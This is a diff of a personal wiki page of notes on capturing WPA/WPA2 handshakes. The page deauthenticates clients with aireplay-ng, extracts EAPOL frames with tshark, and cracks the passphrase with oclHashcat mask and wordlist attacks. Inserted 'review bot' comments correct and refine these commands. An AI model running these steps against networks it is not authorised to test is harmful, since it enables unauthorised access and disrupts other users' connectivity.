Ben's notes

Linux, Unix, network, radio...

capture_wpa_handshake

capture_wpa_handshake [2014/06/12 19:50] – [Capture with wifite] admin
capture_wpa_handshake [2014/06/14 22:01] admin
Line 101: Line 101:
 [*] anonce: [*] anonce:
     3B 00 01 41 3D 46 19 79 80 E6 90 E6 AB 3C DB 07     3B 00 01 41 3D 46 19 79 80 E6 90 E6 AB 3C DB 07
-    99 5B 29 78 B5 FF DB 5B 35 CC 2B 53 C0 50 A0 45+    -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- 
 [*] snonce: [*] snonce:
     C6 0A 60 A0 05 03 AF CE FC E4 E7 24 72 4A 24 AC     C6 0A 60 A0 05 03 AF CE FC E4 E7 24 72 4A 24 AC
-    DA 9B 56 4E 9B 16 27 49 8B 65 A4 D3 D9 64 96 4E+    -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- 
 [*] Key MIC: [*] Key MIC:
     AD 60 F8 4B 42 B1 CF E7 9F 82 97 0D 11 B7 CC F1     AD 60 F8 4B 42 B1 CF E7 9F 82 97 0D 11 B7 CC F1
 [*] eapol: [*] eapol:
     01 03 00 75 02 01 0A 00 10 00 00 00 00 00 00 00     01 03 00 75 02 01 0A 00 10 00 00 00 00 00 00 00
-    01 C6 0A 60 A0 05 03 AF CE FC E4 E7 24 72 4A 24 +    -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- --  
-    AC DA 9B 56 4E 9B 16 27 49 8B 65 A4 D3 D9 64 96+    -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- 
     4E 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00     4E 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
-    00 00 16 30 14 01 00 00 0F AC 04 01 00 00 0F AC+    -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- 
     04 01 00 00 0F AC 02 0C 00     04 01 00 00 0F AC 02 0C 00
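Review bot: the redaction in this hunk is inconsistent and does not hide what it seems to: only the second half of anonce and snonce is blanked while the first 16 bytes of each stay in the clear on the unchanged lines above them, the last snonce byte still leaks as the leading `4E` of the unchanged eapol row that follows the two blanked rows, and the final blanked row (`00 00 16 30 14 01 00 00 0F AC 04 01 00 00 0F AC`) is the key-data length plus the RSN information element, which is public capability data and not key material, with its tail `04 01 00 00 0F AC 02 0C 00` left visible anyway. Either blank the whole of both nonces and the whole EAPOL body so the posted values cannot be used to test PSK guesses against this capture, or leave them all as they were; nonces, Key MIC and the EAPOL frame are transmitted in cleartext over the air, so partial blanking buys no privacy and only makes the sample output harder to follow.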
  
Line 121: Line 121:
  
 Quitting aircrack-ng...</code> Quitting aircrack-ng...</code>
 +  * Try cracking with olcHashcat. <code>oclHashcat64.exe -m 2500 out-wpa2.hccap -a 3 -1 ?l?u?d ?1?1?1?1?1?1?1?1?1?1?1?1
 +Session.Name...: oclHashcat
 +Status.........: Aborted
 +Input.Mode.....: Mask (?1?1?1?1?1?1?1?1?1?1?1?1) [12]
 +Hash.Target....: -------- (04:f7:e4:51:e7:a8 <-> d4:ca:6d:53:23:41)
 +Hash.Type......: WPA/WPA2
 +Time.Started...: Thu Jun 12 22:01:32 2014 (2 mins, 5 secs)
 +Time.Estimated.: > 10 Years
 +Speed.GPU.#1...:   126.6 kH/s
 +Speed.GPU.#2...:   129.0 kH/s
 +Speed.GPU.#3...:   129.2 kH/s
 +Speed.GPU.#4...:   124.4 kH/s
 +Speed.GPU.#5...:   129.1 kH/s
 +Speed.GPU.#6...:   129.0 kH/s
 +Speed.GPU.#*...:   767.2 kH/s
 +Recovered......: 0/1 (0.00%) Digests, 0/1 (0.00%) Salts
 +Progress.......: 94814208/16533293572437839872 (0.00%)
 +Skipped........: 0/94814208 (0.00%)
 +Rejected.......: 0/94814208 (0.00%)
 +HWMon.GPU.#1...: 83% Util, 61c Temp, 61% Fan
 +HWMon.GPU.#2...: 86% Util, 62c Temp, 60% Fan
 +HWMon.GPU.#3...: 84% Util, 65c Temp, 48% Fan
 +HWMon.GPU.#4...: 85% Util, 63c Temp, 44% Fan
 +HWMon.GPU.#5...: 84% Util, 58c Temp, 40% Fan
 +HWMon.GPU.#6...: 87% Util, 63c Temp, 48% Fan
 +
 +Started: Thu Jun 12 22:01:32 2014
 +Stopped: Thu Jun 12 22:03:40 2014</code>
 +  * Or try with wordlist and rules.<code>oclHashcat64.exe -a 0 -r rules\best64.rule -m 2500 -o foundpass.txt out-wpa2.hccap totaal_cleanfile.txt</code>
 ====Capture with airmon-ng airodump-ng==== ====Capture with airmon-ng airodump-ng====
   * Enable monitor mode on WiFi. <code># airmon-ng start wlan0   * Enable monitor mode on WiFi. <code># airmon-ng start wlan0
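Review bot: the mask attack added in this hunk cannot succeed as written and should not be shown without that caveat: `-1 ?l?u?d` across twelve `?1` positions is 62^12, about 3.2×10^21 candidates, and at the 767.2 kH/s shown for six GPUs that is on the order of 10^8 years, far beyond even the `> 10 Years` estimate, so the only possible outcome is the `Aborted` status recorded. Suggest stating the keyspace before launching (by hand, or with `--keyspace` where the installed oclHashcat version supports it) and using a mask that reflects a realistic PSK policy, remembering that WPA passphrases are 8 to 63 characters so anything shorter than 8 is wasted; the wordlist-plus-rules command on the following bullet is the approach a reader should actually reproduce. Minor: the bullet text says `olcHashcat` while the binary invoked is `oclHashcat64.exe`.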
Line 138: Line 167:
 wlan0 Intel 6235 iwlwifi - [phy0] wlan0 Intel 6235 iwlwifi - [phy0]
  (monitor mode enabled on mon0)</code>  (monitor mode enabled on mon0)</code>
-  * Find nearest wireless networks. <code># airodump-ng mon0+  * Find nearest wireless networks. If targetting specific AP, fix channel with '-c <chan_num>' <code># airodump-ng mon0
  CH  8 ][ Elapsed: 1 min ][ 2014-06-12 21:06  CH  8 ][ Elapsed: 1 min ][ 2014-06-12 21:06
  
Line 176: Line 205:
  14:49:E0:A4:70:28  C0:CB:38:01:1D:31   -1    1e- 0      0        1  14:49:E0:A4:70:28  C0:CB:38:01:1D:31   -1    1e- 0      0        1
  C4:27:95:75:D8:95  00:22:FA:96:D5:0C  -82    0 - 6e            4</code>  C4:27:95:75:D8:95  00:22:FA:96:D5:0C  -82    0 - 6e            4</code>
-  * Dump packets from target channel. <code># airodump-ng --channel 11 --write channel11 mon0</code>+  * Dump packets from target channel. <code># airodump-ng --channel 11 --bssid 00:11:22:33:44:55 --write channel11 mon0</code>
   * Wait for handshake... or   * Wait for handshake... or
   * Deauthenticate client from network. <code># aireplay-ng --deauth 0 -a <AP_MAC> -c <CLIENT_MAC> mon0</code>   * Deauthenticate client from network. <code># aireplay-ng --deauth 0 -a <AP_MAC> -c <CLIENT_MAC> mon0</code>
   * Or if you don't know the MAC of any associated client, broadcast a deauth. <code># aireplay-ng --deauth 0 -a <AP_MAC> mon0</code>   * Or if you don't know the MAC of any associated client, broadcast a deauth. <code># aireplay-ng --deauth 0 -a <AP_MAC> mon0</code>
   * Extract handshakes. <code>tshark -r <input file name> -R eapol || wlan.fc.type_subtype == 0×88 -w <output file name></code>   * Extract handshakes. <code>tshark -r <input file name> -R eapol || wlan.fc.type_subtype == 0×88 -w <output file name></code>
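Review bot: the tshark command in the last bullet does not run as written: the read filter is unquoted, so the shell treats `||` as a command separator and tries to run `wlan.fc.type_subtype == 0×88 -w <output file name>` as a second command, and `0×88` uses a multiplication sign instead of `0x`. The subtype that carries the ESSID in beacons is 0x08, so the line should read `tshark -r <input file name> -R "eapol || wlan.fc.type_subtype == 0x08" -w <output file name>`; on tshark 1.10 and later `-R` additionally needs `-2`, or use `-Y` with the same filter for a single pass. Two smaller points on the same hunk: `aireplay-ng --deauth 0` sends deauthentication frames indefinitely, and a small count such as `--deauth 5` is enough to force the reassociation that yields the handshake without keeping every client off the network while you wait, and the added `--bssid` filter on airodump-ng is the right change, since it confines the capture file to the target AP so the later handshake extraction has less to sift.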
capture_wpa_handshake.txt · Last modified: 2021/10/09 15:14 by 127.0.0.1